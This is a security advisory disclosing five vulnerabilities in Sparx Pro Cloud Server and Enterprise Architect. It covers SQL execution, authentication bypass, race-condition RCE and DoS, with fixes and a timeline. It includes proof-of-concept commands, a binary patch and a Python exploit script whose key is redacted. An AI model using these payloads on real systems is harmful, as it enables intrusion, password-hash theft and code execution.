📄 Sparx Pro Cloud Server 6.1 / Sparx Enterprise Architect 17.1 SQL Injection

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    Multiple vulnerabilities in Sparx Pro Cloud Server and Enterprise Architect
    ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    
    General information
    ═══════════════════
    
      Multiple vulnerabilities in Sparx Pro Cloud Server (PCS) versions <=
      6.1 and Sparx Enterprise Architect versions <=17.1 allow a remote
      unauthenticated attacker to execute arbitrary sql queries (both read
      and write) within any configured database. In case where PCS is
      installed with WebEA the vulnerabilities allow further for remote
      unauthenticated code execution (RCE) within the web server context.
    
      CVSSv4 chained score: *10.0 Critical*
      (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
    
    
    Fix
    ═══
    
      Currently vendor *did not resolve* any of the CVEs. The PCS
      authentication bypass and race condition seem to be easy to implement
      and I hope vendor will release patches soon.
    
      As a workaround it is best to isolate the PCS instances from internet
      and untrusted networks. Create frequent backups and review access logs
      if possible. You could also setup a proxy to limit the PCS
      authentication bypass (dropping requests with no or wrong model query
      parameter.
    
    
    [Vulnerabilitiy #1] Sparx Pro Cloud Server SQL Command Execution
    ════════════════════════════════════════════════════════════════
    
    CVE
    ───
    
      CVE-2026-42096 - Broken Access Control in Sparx Pro Cloud Server
    
    
    Affected versions
    ─────────────────
    
      Sparx Pro Cloud Server versions <= 6.1 build 167
    
    
    CVSSv4
    ──────
    
      9.4 Critical
      (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
    
    
    Impact
    ──────
    
      PCS works as a remote model for a thick client, running on user's
      computers, called Enterprise Architect (EA). EA connects to PCS and
      works with the exposed database by directly running SQL queries.
      Besides user authentication (which is also vulnerable - see
      vulnerability #2 below) there is no additional access control. Any low
      privileged user can actually run any sql queries permitted by the
      configured external database user. Usually the user configured is at
      least having full access to the model database - thus any low
      privileged user can actually destroy the whole model, retrieve and
      change other user's password hashes and more.
    
      The problem seems to be with legacy thick client EA architecture which
      simply works on a database to manage all the model details.
    
    
    Details
    ───────
    
      The client (EA) is connecting to the PCS HTTP server. The server might
      require authentication *if it is properly configured* - an admin can
      check "Enable Security" in EA but still not select "Require a secure
      and authenticated connection" in PCS configuration what results in *NO
      SERVER SIDE authentication at all*.
    
      Assuming the server side authentication is required the PCS verifies
      the authentication according to configuration - e.g. login/password,
      Active Directory or OpenID.
    
      Then the EA client sends request to perform SQL queries on the
      database in an ecrypted form but the whole encryption scheme is built
      into the client EA binary (actually downloadable from the vendor
      webside without any authentication - as trial version). The encryption
      is symmetric using a key contained within the binary itself thus
      simply this is not any security measure (security by obscurity).
    
      An attacker can obtain the key and then *create and send custom SQL
      queries to be performed by the database*.
    
    
    PoC
    ───
    
      Exploit: https://github.com/br0xpl/sparx_hack/blob/main/eacrypt.py (packet storm attached poc at bottom)
      is a python script which exploits the SQL vulnerability by encrypting
      any SQL command and sending it to the server. For security,
      the real key is removed from the exploit code.
    
      This script receives all users and their hashes from PCS:
      ┌────
      │ python3 eacrypt.py http://${PCS_HOSTNAME} model "select * from t_secuser, t_xref where t_xref.Type='User Setting' and t_xref.Name ='SHA-256' and t_xref.Client=t_secuser.UserID"
      └────
    
    
    Solution
    ────────
    
      It will be hard to introduce proper authorization for all types of SQL
      queries - this would require to rewrite the logic to use some higher
      abstraction API which can be properly authorized.
    
      Until a proper authorized API will be provided a quick solution could
      be at least to verify the SQL queries executed and block the most
      dangerous like asking about other users' passwords and so on. Maybe a
      query whitelist with limiting the view of some critical assets like
      hashes.
    
      For sure it should be transparently stated in the PCS and EA
      documentation web page. Some integrators and admins are aware of this
      risk (there are some topics on the forum mentioning that the model
      security is not in fact security) but this *should be well described
      in both product documentations* as a limitation and risk which needs
      to be understood by clients and taken into consideration at an early
      stage while designing a production system. Otherwise it poses a high
      risk for any company using those products.
    
    
    [Vulnerability #2] Sparx Pro Cloud Server Authentication Bypass
    ═══════════════════════════════════════════════════════════════
    
    CVE
    ───
    
      CVE-2026-42097 - Authentication Bypass in Sparx Pro Cloud Server
    
    
    Affected versions
    ─────────────────
    
      Sparx Pro Cloud Server versions <= 6.1 build 167
    
    
    CVSSv4
    ──────
    
      9.2 Critical
      (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
    
    
    Impact
    ──────
    
      An attacker can *omit PCS authentication* and e.g. combined with the
      previous vulnerability be able to remotely execute arbitrary SQL
      commands (read and write) *without authentication*.
    
    
    Details
    ───────
    
      It seems that PCS requires authentication based on requested URL. EA
      clients sending the encrypted SQL query to PCS are using an url which
      looks as follows:
    
      ┌────
      │ https://${PCS_SERVER_HOSTNAME}/SparxCloudLink.sseap?model=${MODEL_NAME}
      └────
    
      PCS seems to look at the URL and decides how to authenticate the
      request. Unfortunately the SQL command query sends a POST request with
      a binary blob where the model name is defined one more time and this
      is the value that is further used by PCS to execute the query.
    
      Thus an attacker can simply omit the model query parameter and send
      the model name only in the binary blob in both TLS and non-TLS ports
      and the query will be executed even thought there was no
      authentication.
    
    
    PoC
    ───
    
      To quickly verify compare the authenticated response for a request:
      ┌────
      │ curl 'https://${PCS_HOSTNAME}/SparxCloudLink.sseap?model=${MODEL_NAME}' -X POST  -vvv --data 'whatever' -k
      └────
    
      which responds 401 Access Denied to response of a request without the
      query param:
    
      ┌────
      │ curl 'https://${PCS_HOSTNAME}/SparxCloudLink.sseap' -X POST  -vvv --data 'whatever' -k
      └────
    
      which responds 500 Internal Server Error.
    
      To proof this properly use the python code which exploits the #1
      SQL vulnerability and uses the URL without model query parameter to
      omit the authentication.
    
    
    Solution
    ────────
    
      Make a single parameter pointing the model (either in the blob or in
      query param) and hook authentication and query logic on the same
      parameter.
    
    
    [Vulnerability #3] Sparx Enterprise Architect Authorization Bypass
    ══════════════════════════════════════════════════════════════════
    
    CVE
    ───
    
      CVE-2026-42098 - Authorization Bypass in Sparx Enterprise Architect
    
    
    Affected versions
    ─────────────────
    
      Sparx Enterprise Architect versions <= 17.1
    
    
    CVSSv4
    ──────
    
      7.7 High
      (CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
    
    
    Impact
    ──────
    
      Sparx Enterprise Architect software has a security feature which can
      be enabled. When enabled the users can be limited to perform only some
      actions by roles but this is not a real security measure as it can be
      easily bypassed.
    
      *Any authenticated user can actually perform any action on the model*
      including deletion, stealing of other users' passwords and many
      others. This *includes configurations with Pro Cloud Server* where
      vendor advertises that PCS brings high level of security for the
      model:
    
            Robust security features are designed to protect sensitive
            model information, *including role-based access control*,
            encryption, authentication mechanisms and audit trails.
    
            source: <https://www.sparxsystems.eu/pro-cloud-server/>
    
    
    Details
    ───────
    
      This vulnerability, most probably, is a result of the legacy thick
      client architecture described in the vulnerability #1.
    
      The EA documentation states briefly that the security is not a real
      security:
    
            The Security system in Enterprise Architect is designed to
            facilitate collaboration, *not as a barrier to incursion*.
    
            source:
            <https://sparxsystems.com/enterprise_architect_user_guide/17.1/guide_books/tools_ba_security.html>
    
      but right below it suggests that model assets should be secured:
    
            The information contained in the Repository is a valuable
            organizational asset that needs to be maintained and
            secured as such. The asset must be protected from both
            *intentional* and inadvertent compromises of content. The
            Security system allows update functions to be restricted
            to a set of users or groups with the appropriate defined
            permission. Packages, elements and diagrams can be locked
            by users, preventing others from updating them.
    
            source:
            <https://sparxsystems.com/enterprise_architect_user_guide/17.1/guide_books/tools_ba_security.html>
    
      Unfortunately the current design is not protecting against intentional
      compromises of content. An attacker can modify the EA client behavior
      (e.g. using a debugger) to login in as any other user or administrator
      - then it is possible to do every possible change to the repository.
    
    
    PoC
    ───
    
      To show how it works it is enough to patch the binary to change the
      logic and accept all incorrect passwords and reject correct ones. For
      the file version 17.1.0.1714 of EA.exe (md5sum:
      69dfe7b98d1fc156d15d8aeff726cfce) the following would patch the logic:
    
      ┌────
      │ printf '\x84' | dd of=EA.exe bs=1 seek=$((0x34657B2)) conv=notrunc
      └────
    
      Then run the patched exe and try to login to local model with
      different password. It also works obviously for cloud models which do
      not require server HTTP authentication or when using the "Login as
      different user option".
    
    
    Solution
    ────────
    
      The way security works for EA should be properly and transparently
      presented in the EA documentation and installation notes. The sentence
      quoted above is not enough and can be easily misinterpreted by many
      users leading to vulnerabilities.
    
      Also it should be explained that even when using PCS after
      authentication there is no authorization until visibility levels are
      enabled which are working per whole database manager not user - so in
      fact there is no user based RBAC but rather database manager RBAC what
      is much more coarse grained then per user roles access control.
    
      In terms of combination of EA and PCS it is possible to secure the
      design by e.g. following the recommendations proposed in vulnerability
      #1.
    
    
    [Vulnerability #4] Sparx Pro Cloud Server WebEA Remote Code Execution
    ═════════════════════════════════════════════════════════════════════
    
    CVE
    ───
    
      CVE-2026-42099 - Race Condition in Sparx Pro Cloud Server
    
    
    Affected versions
    ─────────────────
    
      Sparx Pro Cloud Server versions <= 6.1 build 167
    
    
    CVSSv4
    ──────
    
      9.0 Critical
      (CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
    
    
    Impact
    ──────
    
      PCS configured with WebEA PHP application allows for remote command
      execution using the /data_api/dl_internal_artifact.php endpoint. This
      URL is used by WebEA to download content of a internal artifact. A
      remote attacker having access to the PCS repository is able to inject
      a malicious php file into the model and then request its download.
    
      The vulnerable dl_internal_artifact.php allows the remote attacker to
      create temporary php file and concurrently execute it before it gets
      deleted.
    
      The remote attacker can use this attack to gain execution in context
      of WebEA which allows to further explore the WebEA and PCS server
      configuration.
    
    
    Details
    ───────
    
      The vulnerable file first downloads the properties of the object
      pointed by guid parameter:
    
      ┌────
      │ 49  include('get_properties.php');
      │ 50  $sObjectName = SafeGetArrayItem1Dim($aCommonProps, 'name');
      │ 51  $sDocContent = SafeGetArrayItem1Dim($aDocument, 'content');
      │ 52  $sExtension = SafeGetArrayItem1Dim($aDocument, 'extension');
      │ 53  $sFileName = $sObjectName;
      │ 54  $iExtLength = strlen($sExtension);
      │ 55  $sObjectNameEnd = substr($sObjectName, -$iExtLength);
      │ 56  if($sExtension !== $sObjectNameEnd)
      │ 57  {
      │ 58    $sFileName = $sObjectName . $sExtension;
      │ 59  }
      └────
      Listing 1: WebEA/data_api/dl_internal_artifact.php
    
      Then the loaded content is saved in current location (__DIR__) and the
      evaluated above filename and then it is returned:
    
      ┌────
      │ 77  ...
      │ 78  function DownloadFromTempFile($sFileName, $sDocContent)
      │ 79  {
      │ 80    $decoded = base64_decode($sDocContent);
      │ 81    file_put_contents($sFileName, $decoded);
      │ 82    if (file_exists($sFileName)) {
      │ 83          header('Content-Description: File Transfer');
      │ 84          header('Content-Type: application/octet-stream');
      │ 85          header('Content-Disposition: attachment; filename="'.basename($sFileName).'"');
      │ 86          header('Expires: 0');
      │ 87          header('Cache-Control: must-revalidate');
      │ 88          header('Pragma: public');
      │ 89          header('Content-Length: ' . filesize($sFileName));
      │ 90          readfile($sFileName);
      │ 91          unlink($sFileName);
      │ 92          exit;
      │ 93    }
      │ 94  }
      │ 95  ...
      └────
      Listing 2: WebEA/data_api/dl_internal_artifact.php
    
      The attacker having access to the repository fully controls both: 1)
      the filename and 2) the contents. Thus it is possible to simply write
      a .php file in the current directory.
    
      The script however deletes the file in line 91 above. However, there
      is a race condition - if the readfile takes longer to transmit (large
      file size, slow tcp client) then the readfile will simply block
      waiting for the client to receive. At the same time the file can be
      requested in another tcp connection executing the exploit php code.
    
    
    PoC
    ───
    
      1. Using vulnerabilities #1 and #2 attacker can create the artifact in
         the target repository:
         ┌────
         │ python3 eacrypt.py https://${PCS_HOSTNAME} ${MODEL_NAME} "insert into t_object (object_id, object_type, name, author, style, ea_guid) values (100000, 'Artifact', 'poc.php', 'Admin', 'ExtDoc=1;', '{\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\!C}')"
         │ # insert the document (zipped php file simply printing "Test") as "poc.php"
         │ python3 eacrypt.py https://${PCS_HOSTNAME} ${MODEL_NAME} "insert into t_document (docid, docname, elementid, elementtype, bincontent, doctype, author, isactive, sequence) values ('{\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\!C}', 'poc.php', '{\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\!C}', '.php', cast(x'504b03041400000008005497575bfe1a3fd00c0300006141030007001c007374722e6461745554090003bf5efa68ce5efa6875780b000104e803000004e8030000edcdb10980301000c0fee1e750d3b8809825b28104ec0ce8fe388556770bdc56c73932fa715ef3d4fafd4c4bc65a32daf7241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482492df92b266d43de305504b01021e031400000008005497575bfe1a3fd00c03000061410300070018000000000001000000a481000000007374722e6461745554050003bf5efa6875780b000104e803000004e8030000504b050600000000010001004d0000004d0300000000' as blob sub_type binary), 'ExtDoc', 'Admin', 177, 0)"  
         └────
    
      2. In one terminal start to query the poc.php file until it is
         executed:
         ┌────
         │ while [ true ]; do curl 'https://${WEBEA_HOSTNAME}/data_api/poc.php' -k; done 2> /dev/null | grep Test
         └────
    
      3. While the above command is executing in another terminal or logged
         in browser window open the following URL:
    
         ┌────
         │ https://${WEBEA_HOSTNAME}/data_api/dl_internal_artifact.php?guid=el_%7B8889BA10-6178-4047-9273-37FC75B0FCF6%7D&modelno=1
         └────
    
      4. In the terminal from step 2 there should be "Test" printed (proof
         that php code executed), if not try to repeat step 3.
    
    
    Solution
    ────────
    
      The solution should be to return the content without saving it to
      disk. If necessary it should be saved in a temporary folder not
      accesible within webserver. Also the temporary file does not have to
      have the same name as the name returned - it should not use the
      filename from the model (controlled by user).
    
    
    [Vulnerability #5] Sparx Pro Cloud Server Deny of Service in the /SparxCloudLink.sseap endpoint
    ═══════════════════════════════════════════════════════════════════════════════════════════════
    
    CVE
    ───
    
      CVE-2026-42100 - DoS in Sparx Pro Cloud Server
    
    
    Affected versions
    ─────────────────
    
      Sparx Pro Cloud Server versions <= 6.1 build 167
    
    
    CVSSv4
    ──────
    
      8.7 High
      (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)
    
    
    Impact
    ──────
    
      An attacker can make the PCS service exit causing a Deny of Service.
      The error was not deeply analyzed but it is possible that this or
      similar buffer operation bugs could be exploited to a code execution.
    
    
    Details
    ───────
    
      Sending an SQL query with started escape sequence "{" without the
      finishing curly brace causes the PCS service to terminate
      unexpectedly.
    
    
    PoC
    ───
    
      Run the following SQL query:
      ┌────
      │ python3 eacrypt.py http://${PCS_HOSTNAME} model "select {asd"
      └────
    
      The script will finish with "Connection reset by peer" error and the
      service will exit with the following message:
    
            [FATAL]: ————————————– [FATAL]: Thread 112 Unrecoverable
            error
    
    
    Solution
    ────────
    
      Correct the handling of escape sequencing and parsing the SQL query
      for proper boundary checks. Recheck that there are no potential buffer
      overflow errors within the logic.
    
    
    Timeline
    ════════
    
      • 09.2025 - Vulnerabilities identified.
      • 21.11.2025 - Sending details to CERT Polska to contact vendor.
      • 25.11.2025 - First contact of CERT Polska with Vendor.
      • 06.02.2026 - First Vendor reply with standard first-support-line
        questions about products, versions etc.
      • 14.04.2026 - Because of lack of progress Vendor was informed about
        planned publication according to the procedure - within 90 days of
        providing details.
      • 19.05.2026 - CVEs published.
    
    
    References
    ══════════
    
      • <https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html>
        - details with video
      • <https://efigo.pl/blog/CVE-2026-42096/> - summary
      • <https://cert.pl/en/posts/2026/05/CVE-2026-42096> - advisory
      • <https://sparxsystems.com/products/procloudserver/> - product’s
        website
    
    Credits
    ═══════
    
      Author: Blazej Adamczyk (br0x) | <https://sploit.tech/>
    
      Team: Efigo <https://efigo.pl/>
    
    
    --- packet storm attached poc ---
    
    import sys
    import requests
    import urllib3
    import pycurl
    from io import BytesIO
    import zipfile
    
    
    
    k="HERE_SHOULD_BE_THE_KEY"
    x=[4, 2, 0, 6, 3, 1, 5]
    xr=[x.index(i) for i in range(7)]
    
    def mangle(s:str) -> str:
        o=bytearray(s,"utf-8")
        for i in range((len(s) // 7)*7):
            o[i]=ord(s[((i // 7)*7)+xr[i % 7]])
        return o.decode("utf-8")
    
    
    def demangle(s:str) -> str:
        o=bytearray(s,"utf-8")
        for i in range((len(s) // 7)*7):
            o[i]=ord(s[((i // 7)*7)+x[i % 7]])
        return o.decode("utf-8")
    
    
    
    
    
    def custom_decode(ciphertext: str, key: str) -> str:
        """
        Decode using the custom cipher.
    
        ciphertext : input string (Unicode)
        key       : key string (Unicode)
    
        Returns plaintext string (printable ASCII 0x20–0x7E).
        """
        output_chars = []
        length = len(ciphertext)
        key_len = len(key)
    
        for i, ch in enumerate(ciphertext):
            # load plaintext character as integer
            c_val = ord(ch)
    
            # derive key value (word from key string)
            k_val = ord(key[(i+length) % key_len])
    
            c_val = c_val - 0x20 - k_val + 0x40
            
            if c_val<0x20:
                c_val=c_val+0x5E
            if c_val>(0x5E+0x20):
                c_val=c_val-0x5E
    
            output_chars.append(chr(c_val))
    
        return "".join(output_chars)
    
    
    
    
    def custom_encode(plaintext: str, key: str) -> str:
        """
        Encode plaintext using the custom cipher.
    
        plaintext : input string (Unicode)
        key       : key string (Unicode)
    
        Returns encoded string (printable ASCII 0x20–0x7E).
        """
        output_chars = []
        length = len(plaintext)
        key_len = len(key)
    
        for i, ch in enumerate(plaintext):
            # load plaintext character as integer
            c_val = ord(ch)
    
            # subtract 0x40
            c_val = c_val - 0x40
    
            # derive key value (word from key string)
            k_val = ord(key[(i+length) % key_len])
            
            # add key
            total = k_val + c_val
    
            # modulo 94
            total = total % 0x5E
    
            # add 0x20 (ensures printable ASCII)
            encoded_val = total + 0x20
    
            # append encoded character
            output_chars.append(chr(encoded_val))
    
        return "".join(output_chars)
    
    
    def test(debug_type, debug_msg):
        print("debug(%d): %s" % (debug_type, debug_msg))
    
    if __name__ == "__main__":
    
        if (len(sys.argv)!=4):
            print("Usage: "+sys.argv[0]+" URL_without_sparxcloudlink_path model_name sql")
            exit(-1)
    
        host = sys.argv[1]
        repo = sys.argv[2]
        sqli = sys.argv[3]
        #url = "%s/SparxCloudLink.sseap?model=%s"%(host,repo)
        url = "%s/SparxCloudLink.sseap"%(host)
        print(url)    
        
        
        sqli = str(len(sqli))+":"+sqli
        
        fill="+d1XL|@"
        sqli += fill[-(7-(len(sqli)%7)):]
        print (sqli)
        #sqli="23:Select * from t_secuser|@"
        ret=custom_encode(mangle(sqli),k)
        
        
        binary=bytes([0,0,0,1,0,0])
        binary+=bytes.fromhex('%04X'%(len(ret)*2+66))
        
        
        binary+=bytes.fromhex('%04X'%(len(repo)))
        for c in repo:
            binary+=bytes([ord(c),0])
        
        
        binary+=bytes([0,1,0,0])
        binary+=bytes.fromhex('%04X'%(len(ret)))
        
        for c in ret:
            binary+=bytes([ord(c),0])
        
        c=pycurl.Curl()
        c.setopt(pycurl.URL, url)
        c.setopt(pycurl.READDATA, BytesIO(binary))
        c.setopt(pycurl.POSTFIELDSIZE, len(binary))
        c.setopt(pycurl.POST, 1)
        c.setopt(pycurl.VERBOSE, 1)
        c.setopt(pycurl.DEBUGFUNCTION, test)
        c.setopt(pycurl.HTTPHEADER, ['Content-Type: ' , 'Accept: ', 'EnterpriseArchitect-Build: 1527' , 'EnterpriseArchitect-InternalBuild: 481' , 'User-Agent: Enterprise Architect/15.1.1527' , 'Connection: Keep-Alive' , 'Cache-Control: no-cache'])
        body = BytesIO()
        c.setopt(pycurl.WRITEDATA, body)
        c.setopt(pycurl.SSL_VERIFYPEER, 0)
        c.setopt(pycurl.SSL_VERIFYHOST, 0)
        c.perform()
        c.close()
        
        try:
            z = zipfile.ZipFile(body)
            print(z.read('query.xml').decode('utf-8'))
        except zipfile.BadZipFile:
            sys.stdout.buffer.write(body.getvalue())